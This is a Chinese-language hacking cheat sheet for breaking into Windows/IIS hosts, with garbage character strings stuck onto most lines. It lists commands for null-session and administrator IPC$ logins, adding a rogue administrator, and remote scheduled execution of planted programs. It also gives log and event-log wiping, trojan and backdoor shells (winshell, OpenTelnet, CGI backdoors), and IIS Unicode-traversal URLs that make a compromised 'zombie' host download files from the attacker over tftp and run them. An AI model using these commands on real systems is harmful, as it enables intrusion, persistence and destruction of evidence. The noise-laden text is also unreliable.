网管和黑客都必须知道的命令
k1QpKn* 常用的几条NET命令:
6L)%T02C V,$0p1?J (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
]Ux<aiY]a
5H ue7'LS (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
8 XU1/i7N >Q(3*d > (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
3+XOZh8 3`k;a1Z#O' (查看远程主机时间) net time \\IP地址
Zl*X?5u KQ~i<1&j (定时启动某个程序) at \\IP地址 02:18 readme.exe
7AObC4 g [i]Ub0Dh7 (查看共享) net view \\IP地址
SLh(9%S; /kfgx{jZ (查看netbios工作组列表) nbtstat -A IP地址
@;'o2 C+TI]{t (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
P'`r )a-Du$kd (这两条把自己增加到管理员组): net user 用户名 密码 /add
"sG=wjcw^ ariLG [:X net localgroup Administrators 用户名 /add
nJo`B4'U .C--gQpIv (断开连接) net use \\IP地址\ipc$ /delete
(;q;E\Ejq rYbpih=x 扫尾:
({q?d[q[ RO.k]x6 del C:\winnt\system32\logfiles\*.*
Bro9YP4< Rb.SY{}C del C:\winnt\ssytem32\config\*.evt
g[3)P+ Ry'= ke del C:\winnt\system32\dtclog\*.*
_A=$oVe 1&-
</G# del C:\winnt\system32\*.log
)'~6HO8Z [<6S%s del C:\winnt\system32\*.txt
$g
sxO!G {HCzp,Y del C:\winnt\*.txt
Rp5#clsy ?#45wC del C:\winnt\*.log
DK$s&zf $fzaPD4. 一、netsvc.exe
R;j!}D!4 e:5bzk!~ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
<>8WQn,K c`o7d)_Ke netsvc /list \\IP地址
}b-g*dn]5 ~x|F)~:0= netsvc schedule \\IP地址 /query
uH(f$A /C6k+0ApMT netsvc \\IP地址 schedule /start
N|6MP
e {QwHc5Bf 二、OpenTelnet.exe
@0F3$ ?nmn1`UT 远程启动主机的Telnet服务,并绑定端口到7878,例如:
`I3r3WyA r.BIJt) OpenTelnet \\IP地址 用户名 密码 1 7878
HBMhtfWW \Rp-;.I@6 然后就可以telnet到主机的7878端口,进入DOS方式下:
* cgI.+ ?W)A telnet IP地址 7878
xLC3>>P 6E^.7%3 三、winshell.exe
|fHV2Y`:g v+X)Qmzf~ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
6#HK'7ClL u4/kR p Path (查看winshell主程序的路径信息)
{o>j6RS\ nYX@J6! b reBoot (重新启动机器)
@9lUSk^9 /%;mqrdk d shutDown (关闭机器)
hX=A)73( d&+h}O s Shell (执行后你就会看到可爱的“C:\>”)
cj1cZ- ?]}8o}G x eXit (退出本次登录会话,此命令并不终止winshell的运行)
FN8NTBk CL+}|7O( CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
@]ytla>d =_:et0 四、3389登陆器,GUI方式登录远程主机的
d%o&+l# IyWI5Q"t 五、elsave.exe
tV{4"Ij9[ Y4v|ko`l% 事件日志清除工具
OR;uqV@ BBtzs^C| elsave -s \\IP地址 -l "application" -C
3G(miP6 %y@Hh= elsave -s \\IP地址 -l "system" -C
50o~ P!Lz| <psZQdH elsave -s \\IP地址 -l "security" -C
x;8A!8w AD|2qM)) 执行后成功清除应用程序日志,系统日志,安全日志
ce7CcHQ?B Yo|,]X>/ 六、hbulot.exe
w.\&9]P3~ ~,i-8jl, 开启win2kserver和winxp的3389服务
1q,{0s_kp lLF-{ hbulot [/r]
(aH'h1,G `0Oh_8" 使用/r表示安装完成后自动重起目标使设置生效。
"$2y-| j4^9 7 七、nc.exe(netcat.exe)
!;KCU^9 ;,?KI$K 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
5) pj]S!]- _t^{a]/H 想要连接到某处: nc [-options] hostname port[s] [ports] ...
s]f6/x/~
&2{tF 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
!Rhlf.x ,}K7Dg^1 参数:
61)-cVC oz}+T(@O -e prog 程序重定向,一旦连接,就执行 [危险!!]
9f<MQ6_UU }<9cL' -g gateway source-routing hop point[s], up to 8
tF{D= ;G /assq+H -G num source-routing pointer: 4, 8, 12, ...
V;,{} qLB)XnQ -h 帮助信息
a
0GpfW$t yrC7F`. -i secs 延时的间隔
v~@pMA$(h ):b$xNn -l 监听模式,用于入站连接
TX&Jt% x7eQ2h6O -n 指定数字的IP地址,不能用hostname
c'S,hCe* Q|D @Yd\ -o file 记录16进制的传输
'|Kmq5) .O0+H+ -p port 本地端口号
p(/dBt[3k 'a\%L:` -r 任意指定本地及远程端口
.K p >8qQK r\" -s addr 本地源地址
paD !Z0v& 7r~~Y%=C| -u UDP模式
B4i!/@0s g.zEn/SM -v 详细输出——用两个-v可得到更详细的内容
3%%o?8ES fR*q?, -w secs timeout的时间
f
(F)1 U qFv}VsnF -z 将输入输出关掉——用于扫描时
"saUai4z 八、TFTPD32.EXE
\xnWciQ#{ Is{KN!Hw 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
5*,f
Fib u (em&M http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
&8g?4v ucG@?@JENm 然后可以直接令文件运行:
6 1F(<! <cqbUL http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
A*}.EClH Dk(1}%0U/ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
>JC {ZI)nQ{ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
^]W<X"H+Z y&?6FY 一、一 Xscan命令行运行参数说明:
SBIj<Yy] !3 f?:M 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
=[@zF9 oaoU _V 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
?6fnpGX@a @AIaC-,~] xscan -file <主机列表文件名> <检测项目> [其他选项]
\\u<S=G S&b*rA02zp 其中<检测项目> 含义如下:
`m!j$,c. LYaZ1* -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
o .qf _A oBzfbg8p -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
H\:lxR^ uFPF!Ern -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
7 D^gMN%p [`c^4E -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
/M3Y~l$ /qy-qUh3h -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
(tZrw5@ /.o^R6 [其他选项] 含义如下:
.2v_H5< .MJofE;Jn -v: 显示详细扫描进度
^w c"&;=c| (<}&DE -p: 跳过Ping不通的主机
/q5v"iX]T 37|&?|| -o: 跳过没有检测到开放端口的主机
3~S8!nx EioB%f3 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10